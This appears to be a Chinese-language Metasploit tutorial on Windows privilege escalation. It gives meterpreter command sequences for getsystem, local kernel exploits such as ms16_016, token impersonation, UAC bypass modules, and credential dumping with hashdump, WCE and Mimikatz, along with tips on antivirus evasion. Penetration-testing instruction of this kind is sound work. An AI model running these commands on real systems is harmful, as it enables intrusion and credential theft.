Metasploit权限提升全面指南<\/h1>

0×01 权限提升概述<\/h2>

权限提升是渗透测试中的关键环节，主要分为两类：<\/p>

纵向提权<\/strong>：低权限角色获得高权限角色的权限<\/p>

例如：webshell权限提升到管理员权限<\/li> <\/ul> <\/li>

横向提权<\/strong>：获取同级别角色的权限<\/p>

例如：通过系统A获取系统B的权限<\/li> <\/ul> <\/li> <\/ol>
检查当前权限<\/h3>
在meterpreter shell中：<\/p>
shell whoami \/groups <\/code><\/pre> 查看Mandatory Label<\/code>判断当前权限级别：<\/p> Medium MandatoryLevel<\/code>：标准用户<\/li> High MandatoryLevel<\/code>：管理员权限<\/li> <\/ul> 0×02 getsystem提权<\/h2> 基本使用<\/h3> getsystem -h # 查看帮助 getsystem # 尝试所有技术提权 <\/code><\/pre> 三种提权技术<\/h3> 命名管道模拟<\/li> 令牌复制<\/li> 命名管道模拟（替代方案）<\/li> <\/ol> 特点<\/strong>：<\/p> 简单高效<\/li> 建议首先尝试此方法<\/li> <\/ul> 0×03 利用本地漏洞提权<\/h2> 步骤<\/h3> 检查当前权限：<\/p> getuid <\/code><\/pre> <\/li> 获取系统补丁信息：<\/p> shell systeminfo # 或检查c:\windows\下的补丁日志 <\/code><\/pre> <\/li> 查找可用漏洞（常见漏洞示例）：<\/p> ms13_053<\/li> ms14_058<\/li> ms16_016<\/li> ms16_032<\/li> <\/ul> <\/li> <\/ol> 漏洞资源网站<\/h3> 安全焦点：http:\/\/www.securityfocus.com\/bid<\/li> Exploit-DB：http:\/\/www.exploit-db.com<\/li> <\/ol> 操作示例（以ms16_016为例）<\/h3> background # 转为后台 search ms16_016 use exploit\/windows\/local\/ms16_016_webdav set SESSION [当前session ID] exploit <\/code><\/pre> 部分系统补丁对照表<\/h3> 系统版本<\/th> 补丁号<\/th> 对应漏洞<\/th> <\/tr> <\/thead> Win2003<\/td> KB2360937<\/td> MS10-084<\/td> <\/tr> Win2008<\/td> KB2478960<\/td> MS11-014<\/td> <\/tr> Win2012<\/td> KB2507938<\/td> MS11-056<\/td> <\/tr> 通用<\/td> KB3045171<\/td> MS15-051<\/td> <\/tr> 通用<\/td> KB3000061<\/td> MS14-058<\/td> <\/tr> <\/tbody> <\/table> 0×04 假冒令牌提权<\/h2> 令牌类型<\/h3> Delegation Tokens<\/strong>：授权令牌，支持交互式登录<\/li> Impersonation Tokens<\/strong>：模拟令牌，非交互会话<\/li> <\/ol> 操作步骤<\/h3> use incognito list_tokens -u # 列出可用令牌 impersonate_token [管理员令牌路径] # 例如：impersonate_token "WIN-57TJ4B561MT\Administrator" <\/code><\/pre> 验证<\/h3> shell whoami <\/code><\/pre> 0×05 绕过UAC提权<\/h2> UAC设置级别<\/h3> 始终通知<\/li> 仅在程序试图更改我的计算机时通知我（默认）<\/li> 同上但不降低桌面亮度<\/li> 从不提示<\/li> <\/ol> 方法一：Bypassuac模块<\/h3> use exploit\/windows\/local\/bypassuac set SESSION [当前session ID] exploit <\/code><\/pre> 注意事项<\/strong>：<\/p> 当前用户必须在管理员组<\/li> UAC设置为默认级别<\/li> 会创建文件，可能被杀毒软件检测<\/li> <\/ul> 方法二：Bypassuac_injection<\/h3> use exploit\/windows\/local\/bypassuac_injection <\/code><\/pre> 特点：运行在内存中，不触碰硬盘<\/p> 方法三：RunAs模块<\/h3> use exploit\/windows\/local\/ask set FILENAME "update.exe" # 可自定义 exploit <\/code><\/pre> 特点<\/strong>：<\/p> 需要用户交互点击"是"<\/li> 可结合免杀技术<\/li> <\/ul> 0×06 HASH攻击<\/h2> 方法一：hashdump<\/h3> hashdump # 提取本地HASH smart_hashdump # 提取域所有用户HASH <\/code><\/pre> 方法二：WCE工具<\/h3> 上传wce.exe<\/li> 执行： wce -w # 获取明文密码 <\/code><\/pre> <\/li> <\/ol> 方法三：Mimikatz<\/h3> load mimikatz kerberos # 获取kerberos凭证 <\/code><\/pre> HASH破解网站<\/h3> http:\/\/www.cmd5.com\/<\/li> http:\/\/www.xmd5.com\/<\/li> <\/ol> 附录：常用命令速查<\/h2> 命令<\/th> 功能<\/th> <\/tr> <\/thead> getuid<\/code><\/td> 查看当前权限<\/td> <\/tr> getsystem<\/code><\/td> 尝试自动提权<\/td> <\/tr> sysinfo<\/code><\/td> 查看系统信息<\/td> <\/tr> ps<\/code><\/td> 查看进程列表<\/td> <\/tr> migrate [PID]<\/code><\/td> 迁移到高权限进程<\/td> <\/tr> background<\/code><\/td> 将session转为后台<\/td> <\/tr> <\/tbody> <\/table> 注意事项<\/h2> 按顺序尝试提权方法：getsystem → 本地漏洞 → 令牌假冒 → UAC绕过<\/li> 注意工具免杀处理<\/li> 横向移动前确保已获取足够权限<\/li> Windows 8+系统需要特殊处理<\/li> <\/ol> 通过系统掌握这些提权技术，可以显著提高渗透测试的成功率，但请务必在合法授权范围内使用这些技术。<\/p>